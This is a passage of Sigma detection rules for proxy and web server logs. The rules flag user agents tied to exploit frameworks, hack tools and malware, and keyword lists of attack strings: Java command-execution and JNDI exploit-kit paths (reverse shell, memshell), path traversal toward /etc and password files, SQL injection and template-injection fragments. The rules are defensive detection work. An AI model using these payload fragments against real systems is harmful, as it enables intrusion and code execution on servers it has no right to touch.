Could potentially indicate an uncommon request method.
references:
- https://twitter.com/Carlos_Perez/status/883455096645931008
author: Florian Roth (Nextron Systems)
date: 2017-07-08
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
# Empty string - as used by Powershell's (New-Object Net.WebClient).DownloadString
c-useragent: ''
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_ua_frameworks.yml
================================================
title: Exploit Framework User Agent
id: fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f
status: test
description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
references:
- https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
author: Florian Roth (Nextron Systems)
date: 2017-07-08
modified: 2025-01-18
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent:
# Cobalt Strike https://www.cobaltstrike.com/help-malleable-c2
- 'Internet Explorer *'
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)' # https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/
# Metasploit Framework - Analysis by Didier Stevens https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/
- 'Mozilla/4.0 (compatible; Metasploit RSPEC)'
- 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # old browser, rare, base-lining needed
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' # old browser, rare, base-lining needed
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)' # old browser, rare, base-lining needed
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N'
- 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' # only use in proxy logs - not for detection in web server logs
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13'
- 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)' # Payloads
# Metasploit Update by Florian Roth 08.07.2017
- 'Mozilla/5.0'
- 'Mozilla/4.0 (compatible; SPIPE/1.0'
# - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' # too many false positives expected
# - 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko' # too many false positives expected
- 'Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0'
- 'Sametime Community Agent' # Unknown if prone to false positives - https://github.com/rapid7/metasploit-framework/blob/97095ab3113de2f046e64a64c461a1f888554401/modules/exploits/windows/http/steamcast_useragent.rb
- 'X-FORWARDED-FOR'
- 'DotDotPwn v2.1'
- 'SIPDROID'
- 'Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)' # CobaltStrike https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/
# Empire
- 'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0'
# Exploits
- '*wordpress hash grabber*'
- '*exploit*'
# Havoc
- 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36' # https://github.com/HavocFramework/Havoc/issues/519
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_hacktool.yml
================================================
title: Hack Tool User Agent
id: c42a3073-30fb-48ae-8c99-c23ada84b103
status: test
description: Detects suspicious user agent strings user by hack tools in proxy logs
references:
- https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb
- http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
author: Florian Roth (Nextron Systems)
date: 2017-07-08
modified: 2022-07-07
tags:
- attack.initial-access
- attack.t1190
- attack.credential-access
- attack.t1110
logsource:
category: proxy
detection:
selection:
c-useragent|contains:
# Vulnerability scanner and brute force tools
- '(hydra)'
- ' arachni/'
- ' BFAC '
- ' brutus '
- ' cgichk '
- 'core-project/1.0'
- ' crimscanner/'
- 'datacha0s'
- 'dirbuster'
- 'domino hunter'
- 'dotdotpwn'
- 'FHScan Core'
- 'floodgate'
- 'get-minimal'
- 'gootkit auto-rooter scanner'
- 'grendel-scan'
- ' inspath '
- 'internet ninja'
- 'jaascois'
- ' zmeu '
- 'masscan'
- ' metis '
- 'morfeus fucking scanner'
- 'n-stealth'
- 'nsauditor'
- 'pmafind'
- 'security scan'
- 'springenwerk'
- 'teh forest lobster'
- 'toata dragostea'
- ' vega/'
- 'voideye'
- 'webshag'
- 'webvulnscan'
- ' whcc/'
# SQL Injection
- ' Havij'
- 'absinthe'
- 'bsqlbf'
- 'mysqloit'
- 'pangolin'
- 'sql power injector'
- 'sqlmap'
- 'sqlninja'
- 'uil2pn'
# Hack tool
- 'ruler' # https://www.crowdstrike.com/blog/using-outlook-forms-lateral-movement-persistence/
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)' # SQLi Dumper
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_malware.yml
================================================
title: Malware User Agent
id: 5c84856b-55a5-45f1-826f-13f37250cf4e
status: test
description: Detects suspicious user agent strings used by malware in proxy logs
references:
- http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules
- http://www.botopedia.org/search?searchword=scan&searchphrase=all
- https://networkraptor.blogspot.com/2015/01/user-agent-strings.html
- https://perishablepress.com/blacklist/ua-2013.txt
- https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents
- https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q
- https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large
- https://twitter.com/crep1x/status/1635034100213112833
author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-07-08
modified: 2024-04-14
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent:
# RATs
- 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0' # DragonOK
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)' # Used by PlugX - base-lining recommended - https://community.rsa.com/thread/185439
- 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)' # Used by PlugX - old - https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/
- 'HttpBrowser/1.0' # HTTPBrowser RAT
- '*<|>*' # Houdini / Iniduoh / njRAT
- 'nsis_inetc (mozilla)' # ZeroAccess
- 'Wget/1.9+cvs-stable (Red Hat modified)' # Dyre / Upatre
# Ghost419 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)'
# Malware
- '*zeroup*' # W32/Renos.Downloader
- 'Mozilla/5.0 (Windows NT 5.1 ; v.*' # Kazy
- '* adlib/*'
- '* tiny' # Trojan Downloader
- '* BGroom *' # Trojan Downloader
- '* changhuatong'
- '* CholTBAgent'
- 'Mozilla/5.0 WinInet'
- 'RookIE/1.0'
- 'M' # HkMain
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)' # Egamipload - old UA - probable prone to false positives
- 'Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)' # Yakes
- 'backdoorbot'
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)' # Sality
- 'Opera/8.81 (Windows NT 6.0; U; en)' # Sality
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)' # Sality
- 'Opera' # Trojan Keragany
- 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)' # Fareit
- 'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)' # Webshell's back connect
- 'MSIE' # Toby web shell
- '*(Charon; Inferno)' # Loki Bot
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)' # Fareit / Pony
- 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' # https://www.virustotal.com/gui/file/8abbef8e58f012d45a7cb46c3c2729dcd33cf53e721ff8c59e238862aa0a9e0e/detection
- 'Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)' # MacControl malware https://www.virustotal.com/gui/file/d60f61f1f03a5011a0240694e110c6d370bf68a92753093186c6d14e26a15428/detection https://www.symantec.com/connect/blogs/osxmacontrol-back-it-again
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' # used by Zebrocy malware https://app.any.run/tasks/7d7fa4a0-6970-4428-828b-29572abf9ceb/
# Ursnif
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)'
- 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)'
# Emotet
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; InfoPath.3)' # https://twitter.com/webbthewombat/status/1225827092132179968
# Lockbit (https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q)
- 'Mozilla/5.0 (Windows NT 6.1)'
- 'AppleWebkit/587.38 (KHTML, like Gecko)'
- 'Chrome/91.0.4472.77'
- 'Safari/537.36'
- 'Edge/91.0.864.37'
- 'Firefox/89.0'
- 'Gecko/20100101'
# Others
- '* pxyscand*'
- '* asd'
- '* mdms'
- 'sample'
- 'nocase'
- 'Moxilla'
- 'Win32 *'
- '*Microsoft Internet Explorer*'
- 'agent *'
- 'AutoIt' # Suspicious - base-lining recommended
- 'IczelionDownLoad'
- 'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)' # https://unit42.paloaltonetworks.com/thor-plugx-variant/
- 'record' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
- 'mozzzzzzzzzzz' # https://blog.sekoia.io/raccoon-stealer-v2-part-1-the-return-of-the-dead/
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0' # Quasar RAT UA https://twitter.com/malmoeb/status/1559994820692672519?s=20&t=g3tkNL09dZZWbFN10qDVjg
- 'Havana/0.1' # https://www.cybereason.com/blog/threat-alert-havanacrypt-ransomware-masquerading-as-google-update
- 'antSword/v2.1' # AntSword Webshell UA
- 'rqwrwqrqwrqw' # Racoon Stealer
- 'qwrqrwrqwrqwr' # Racoon Stealer
- 'rc2.0/client' # Racoon Stealer
- 'TakeMyPainBack' # Racoon Stealer
- 'xxx' # Racoon Stealer
- '20112211' # Racoon Stealer
- '23591' # Racoon Stealer
- '901785252112' # Racoon Stealer
- '1235125521512' # Racoon Stealer
- '125122112551' # Racoon Stealer
- 'B1D3N_RIM_MY_ASS' # Racoon Stealer
- 'AYAYAYAY1337' # Racoon Stealer
- 'iMightJustPayMySelfForAFeature' # Racoon Stealer
- 'ForAFeature' # Racoon Stealer
- 'Ares_ldr_v_*' # AresLoader
# - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106' # seen used by AresLoader
- 'Microsoft Internet Explorer' # https://github.com/silence-is-best/c2db
- 'CLCTR' # https://github.com/silence-is-best/c2db
- 'uploader' # https://github.com/silence-is-best/c2db
- 'agent' # https://github.com/silence-is-best/c2db
- 'License' # https://github.com/silence-is-best/c2db
- 'vb wininet' # https://github.com/silence-is-best/c2db
- 'Client' # https://github.com/silence-is-best/c2db
- 'Lilith-Bot/3.0' # Lilith Stealer - https://twitter.com/suyog41/status/1558051450797690880
- 'svc/1.0' # SVC Loader - https://twitter.com/suyog41/status/1558051450797690880
- 'WSHRAT' # WSHRAT - https://twitter.com/suyog41/status/1558051450797690880
- 'ZeroStresser Botnet/1.5' # Zerobot - https://twitter.com/suyog41/status/1558051450797690880
- 'OK' # Nymaim - https://twitter.com/suyog41/status/1558051450797690880
- 'Project1sqlite' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880
- 'Project1' # DarkCloud - https://twitter.com/suyog41/status/1558051450797690880
- 'DuckTales' # Racoon Stealer
- 'Zadanie' # Racoon Stealer
- 'GunnaWunnaBlueTips' # Racoon Stealer
- 'Xlmst' # Racoon Stealer
- 'GeekingToTheMoon' # Racoon Stealer
- 'SunShineMoonLight' # Racoon Stealer
- 'BunnyRequester' # BunnyStealer
- 'BunnyTasks' # BunnyStealer
- 'BunnyStealer' # BunnyStealer
- 'BunnyLoader_Dropper' # BunnyStealer
- 'BunnyLoader' # BunnyStealer
- 'BunnyShell' # BunnyStealer
- 'SPARK-COMMIT' # SparkRAT - https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ransomware/
- '4B4DB4B3' # B4B3RAT - https://twitter.com/naumovax/status/1718956514491130301
- 'SouthSide' # Racoon Stealer
- 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)' # Latrodectus loader
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_powershell.yml
================================================
title: Windows PowerShell User Agent
id: c8557060-9221-4448-8794-96320e6f3e74
status: test
description: Detects Windows PowerShell Web Access
references:
- https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest
author: Florian Roth (Nextron Systems)
date: 2017-03-13
modified: 2021-11-27
tags:
- attack.defense-evasion
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent|contains: ' WindowsPowerShell/'
condition: selection
falsepositives:
- Administrative scripts that download files from the Internet
- Administrative scripts that retrieve certain website contents
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_ua_rclone.yml
================================================
title: Rclone Activity via Proxy
id: 2c03648b-e081-41a5-b9fb-7d854a915091
status: test
description: Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string
references:
- https://rclone.org/
- https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone
author: Janantha Marasinghe
date: 2022-10-18
tags:
- attack.exfiltration
- attack.t1567.002
logsource:
category: proxy
detection:
selection:
c-useragent|startswith: 'rclone/v'
condition: selection
falsepositives:
- Valid requests with this exact user agent to that is used by legitimate scripts or sysadmin operations
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_ua_susp.yml
================================================
title: Suspicious User Agent
id: 7195a772-4b3f-43a4-a210-6a003d65caa1
status: test
description: Detects suspicious malformed user agent strings in proxy logs
references:
- https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb
author: Florian Roth (Nextron Systems)
date: 2017-07-08
modified: 2022-10-31
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection1:
c-useragent|startswith:
- 'user-agent' # User-Agent: User-Agent:
- 'Mozilla/3.0 '
- 'Mozilla/2.0 '
- 'Mozilla/1.0 '
- 'Mozilla ' # missing slash
- ' Mozilla/' # leading space
- 'Mozila/' # single 'l'
- 'Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol' # https://twitter.com/NtSetDefault/status/1303643299509567488
selection2:
c-useragent|contains:
- ' (compatible;MSIE ' # typical typo - missing space
- '.0;Windows NT ' # typical typo - missing space
- 'loader' # https://twitter.com/securityonion/status/1522614635152744453?s=20&t=gHyPTSq5A27EqKwrCd9ohg
selection3:
c-useragent:
- '_'
- 'CertUtil URL Agent' # https://twitter.com/stvemillertime/status/985150675527974912
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)' # CobaltStrike Beacon https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/
- 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # used by APT28 malware https://threatvector.cylance.com/en_us/home/inside-the-apt28-dll-backdoor-blitz.html
- 'HTTPS' # https://twitter.com/stvemillertime/status/1204437531632250880
- 'Erbium-UA-4ce7c27cb4be9d32e333bf032c88235a' # https://www.cyfirma.com/outofband/erbium-stealer-malware-report
- 'x' # Use by Racoon Stealer but could be something else
- 'xxx' # Use by Racoon Stealer but could be something else
falsepositives:
- c-useragent: 'Mozilla/3.0 * Acrobat *' # Acrobat with linked content
- cs-host|endswith: # Adobe product traffic, example: Mozilla/3.0 (compatible; Adobe Synchronizer 10.12.20000)
- '.acrobat.com'
- '.adobe.com'
- '.adobe.io'
condition: 1 of selection* and not falsepositives
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/proxy_generic/proxy_ua_susp_base64.yml
================================================
title: Potential Base64 Encoded User-Agent
id: 894a8613-cf12-48b3-8e57-9085f54aa0c3
related:
- id: d443095b-a221-4957-a2c4-cd1756c9b747
type: derived
status: test
description: Detects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
references:
- https://blogs.jpcert.or.jp/en/2022/07/yamabot.html
- https://deviceatlas.com/blog/list-of-user-agent-strings#desktop
author: Florian Roth (Nextron Systems), Brian Ingram (update)
date: 2022-07-08
modified: 2023-05-04
tags:
- attack.command-and-control
- attack.t1071.001
logsource:
category: proxy
detection:
selection:
c-useragent|endswith: '='
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/proxy_generic/proxy_webdav_external_execution.yml
================================================
title: Suspicious External WebDAV Execution
id: 1ae64f96-72b6-48b3-ad3d-e71dff6c6398
related:
- id: 4c55738d-72d8-490e-a2db-7969654e375f
type: similar
status: test
description: |
Detects executables launched from external WebDAV shares using the WebDAV Explorer integration, commonly seen in initial access campaigns.
references:
- https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4
- https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
- https://www.trendmicro.com/en_no/research/24/b/cve202421412-water-hydra-targets-traders-with-windows-defender-s.html
- https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html
author: Ahmed Farouk
date: 2024-05-10
tags:
- attack.initial-access
- attack.resource-development
- attack.t1584
- attack.t1566
logsource:
category: proxy
detection:
selection_webdav:
c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/'
cs-method: 'GET'
selection_execution:
c-uri|endswith:
- '.7z'
- '.bat'
- '.dat'
- '.cmd'
- '.exe'
- '.js'
- '.lnk'
- '.ps1'
- '.rar'
- '.url'
- '.vbe'
- '.vbs'
- '.zip'
filter_main_local_ips:
dst_ip|cidr:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- '::1/128' # IPv6 loopback
- 'fe80::/10' # IPv6 link-local addresses
- 'fc00::/7' # IPv6 private addresses
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
================================================
FILE: rules/web/webserver_generic/web_f5_tm_utility_bash_api_request.yml
================================================
title: F5 BIG-IP iControl Rest API Command Execution - Webserver
id: 85254a62-22be-4239-b79c-2ec17e566c37
related:
- id: b59c98c6-95e8-4d65-93ee-f594dfb96b17
type: similar
status: test
description: Detects POST requests to the F5 BIG-IP iControl Rest API "bash" endpoint, which allows the execution of commands on the BIG-IP
references:
- https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash
- https://community.f5.com/t5/technical-forum/icontrolrest-11-5-execute-bash-command/td-p/203029
- https://community.f5.com/t5/technical-forum/running-bash-commands-via-rest-api/td-p/272516
author: Nasreddine Bencherchali (Nextron Systems), Thurein Oo
date: 2023-11-08
tags:
- attack.execution
- attack.t1190
- attack.initial-access
logsource:
category: webserver
detection:
selection:
cs-method: 'POST'
cs-uri-query|endswith: '/mgmt/tm/util/bash'
condition: selection
falsepositives:
- Legitimate usage of the BIG IP REST API to execute command for administration purposes
level: medium
================================================
FILE: rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml
================================================
title: Successful IIS Shortname Fuzzing Scan
id: 7cb02516-6d95-4ffc-8eee-162075e111ac
status: test
description: When IIS uses an old .Net Framework it's possible to enumerate folders with the symbol "~"
references:
- https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml
- https://www.exploit-db.com/exploits/19525
- https://github.com/lijiejie/IIS_shortname_Scanner
author: frack113
date: 2021-10-06
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains: '~1'
cs-uri-query|endswith: 'a.aspx'
cs-method:
- GET
- OPTIONS
# Success only
sc-status:
- 200
- 301
condition: selection
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/webserver_generic/web_java_payload_in_access_logs.yml
================================================
title: Java Payload Strings
id: 583aa0a2-30b1-4d62-8bf3-ab73689efe6c
status: test
description: Detects possible Java payloads in web access logs
references:
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/
- https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md
- https://twitter.com/httpvoid0x2f/status/1532924261035384832
- https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035
author: frack113, Harjot Singh, "@cyb3rjy0t" (update)
date: 2022-06-04
modified: 2023-01-19
tags:
- cve.2022-26134
- cve.2021-26084
- attack.initial-access
- attack.t1190
logsource:
category: webserver
detection:
keywords:
- '%24%7B%28%23a%3D%40'
- '${(#a=@'
- '%24%7B%40java'
- '${@java'
- 'u0022java'
- '%2F%24%7B%23'
- '/${#'
- 'new+java.'
- 'getRuntime().exec('
- 'getRuntime%28%29.exec%28'
condition: keywords
falsepositives:
- Legitimate apps
level: high
================================================
FILE: rules/web/webserver_generic/web_jndi_exploit.yml
================================================
title: JNDIExploit Pattern
id: 412d55bc-7737-4d25-9542-5b396867ce55
status: test
description: Detects exploitation attempt using the JNDI-Exploit-Kit
references:
- https://github.com/pimps/JNDI-Exploit-Kit
- https://web.archive.org/web/20231015205935/https://githubmemory.com/repo/FunctFan/JNDIExploit
author: Florian Roth (Nextron Systems)
date: 2021-12-12
modified: 2022-12-25
tags:
- attack.initial-access
- attack.t1190
logsource:
category: webserver
detection:
keywords:
- '/Basic/Command/Base64/'
- '/Basic/ReverseShell/'
- '/Basic/TomcatMemshell'
- '/Basic/JettyMemshell'
- '/Basic/WeblogicMemshell'
- '/Basic/JBossMemshell'
- '/Basic/WebsphereMemshell'
- '/Basic/SpringMemshell'
- '/Deserialization/URLDNS/'
- '/Deserialization/CommonsCollections1/Dnslog/'
- '/Deserialization/CommonsCollections2/Command/Base64/'
- '/Deserialization/CommonsBeanutils1/ReverseShell/'
- '/Deserialization/Jre8u20/TomcatMemshell'
- '/TomcatBypass/Dnslog/'
- '/TomcatBypass/Command/'
- '/TomcatBypass/ReverseShell/'
- '/TomcatBypass/TomcatMemshell'
- '/TomcatBypass/SpringMemshell'
- '/GroovyBypass/Command/'
- '/WebsphereBypass/Upload/'
condition: keywords
falsepositives:
- Legitimate apps the use these paths
level: high
================================================
FILE: rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml
================================================
title: Path Traversal Exploitation Attempts
id: 7745c2ea-24a5-4290-b680-04359cb84b35
status: test
description: Detects path traversal exploitation attempts
references:
- https://github.com/projectdiscovery/nuclei-templates
- https://book.hacktricks.xyz/pentesting-web/file-inclusion
author: Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)
date: 2021-09-25
modified: 2023-08-31
tags:
- attack.initial-access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-uri-query|contains:
- '../../../../../lib/password'
- '../../../../windows/'
- '../../../etc/'
- '..%252f..%252f..%252fetc%252f'
- '..%c0%af..%c0%af..%c0%afetc%c0%af'
- '%252e%252e%252fetc%252f'
condition: selection
falsepositives:
- Expected to be continuously seen on systems exposed to the Internet
- Internal vulnerability scanners
level: medium
================================================
FILE: rules/web/webserver_generic/web_source_code_enumeration.yml
================================================
title: Source Code Enumeration Detection by Keyword
id: 953d460b-f810-420a-97a2-cfca4c98e602
status: test
description: Detects source code enumeration that use GET requests by keyword searches in URL strings
references:
- https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html
- https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1
author: James Ahearn
date: 2019-06-08
modified: 2022-10-05
tags:
- attack.discovery
- attack.t1083
logsource:
category: webserver
detection:
keywords:
- '.git/'
condition: keywords
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/web/webserver_generic/web_sql_injection_in_access_logs.yml
================================================
title: SQL Injection Strings In URI
id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453
status: test
description: Detects potential SQL injection attempts via GET requests in access logs.
references:
- https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/
- https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/
- https://brightsec.com/blog/sql-injection-payloads/
- https://github.com/payloadbox/sql-injection-payload-list
- https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection
author: Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)
date: 2020-02-22
modified: 2023-09-04
tags:
- attack.initial-access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-method: 'GET'
keywords:
- '@@version'
- '%271%27%3D%271'
- '=select '
- '=select('
- '=select%20'
- 'concat_ws('
- 'CONCAT(0x'
- 'from mysql.innodb_table_stats'
- 'from%20mysql.innodb_table_stats'
- 'group_concat('
- 'information_schema.tables'
- 'json_arrayagg('
- 'or 1=1#'
- 'or%201=1#'
- 'order by '
- 'order%20by%20'
- 'select * '
- 'select database()'
- 'select version()'
- 'select%20*%20'
- 'select%20database()'
- 'select%20version()'
- 'select%28sleep%2810%29'
- 'SELECTCHAR('
- 'table_schema'
- 'UNION ALL SELECT'
- 'UNION SELECT'
- 'UNION%20ALL%20SELECT'
- 'UNION%20SELECT'
- "'1'='1"
filter_main_status:
sc-status: 404
condition: selection and keywords and not 1 of filter_main_*
falsepositives:
- Java scripts and CSS Files
- User searches in search boxes of the respective website
- Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes
level: high
================================================
FILE: rules/web/webserver_generic/web_ssti_in_access_logs.yml
================================================
title: Server Side Template Injection Strings
id: ada3bc4f-f0fd-42b9-ba91-e105e8af7342
status: test
description: Detects SSTI attempts sent via GET requests in access logs
references:
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- https://github.com/payloadbox/ssti-payloads
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-14
tags:
- attack.defense-evasion
- attack.t1221
logsource:
category: webserver
detection:
select_method:
cs-method: 'GET'
keywords:
- '={{'
- '=%7B%7B'
- '=${'
- '=$%7B'
- '=<%='
- '=%3C%25='
- '=@('
- 'freemarker.template.utility.Execute'
- .getClass().forName('javax.script.ScriptEngineManager')
- 'T(org.apache.commons.io.IOUtils)'
filter:
sc-status: 404
condition: select_method and keywords and not filter
falsepositives:
- User searches in search boxes of the respective website
- Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes
level: high
================================================
FILE: rules/web/webserver_generic/web_susp_useragents.yml
================================================
title: Suspicious User-Agents Related To Recon Tools
id: 19aa4f58-94ca-45ff-bc34-92e533c0994a
status: test
description: Detects known suspicious (default) user-agents related to scanning/recon tools
references:
- https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb
- https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst
- https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92
author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
date: 2022-07-19
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
logsource:
category: webserver
detection:
selection:
cs-user-agent|contains:
# Add more tools as you see fit
- 'Wfuzz/'
- 'WPScan v'
- 'Recon-ng/v'
